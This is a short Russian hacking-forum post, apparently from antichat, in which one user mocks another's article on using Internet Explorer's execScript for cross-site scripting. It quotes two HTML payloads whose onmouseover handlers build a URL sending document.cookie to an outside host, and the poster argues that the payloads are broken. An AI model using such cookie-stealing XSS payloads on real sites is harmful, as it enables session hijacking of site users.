Сообщение от
Xex
To Victor: ошибаешься, все что ты написал, должен знать любой...я считаю это базисом и не посчитал нужным расписывать...
P.S>процитируцй над чем ты смеялся...
Над тем как ты пишешь свои коды которые не работают лол.
Код HTML:
<font color=red onmouseover=window.execScript(isNaN(q="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie));window.execScript(alert(q))>Получилось!</font>
Вот так допустим все что будет работать, так это алерт который будет орать
И не болие.
Эту писанину трудно назвать статьей, она скоре является дополнением к написанному Algol'ом по XSS.
Тут Я упал.
Но, видимо, популярность такого метода не такая высокая как у классического по причине есго кривости...
Имхо ну что ты мелешь....JavaScript это вообще протокол, execScript это метод переходить c одного языка на другой.
Выяснено, что он категорически не любит пробелы кавычки и ряд других необходимых символов(например для угона кукисов).
Да не он не любит, а ты не правильно пишешь.
Код HTML:
<font color=red onmouseover=window.execScript(q="http://antichat.org/s/xex.gif?"+document.cookie)>не работает!</font>
И почему это должно работать? О_О
Мда, короче мда, дальше цитировать думаю не стоит.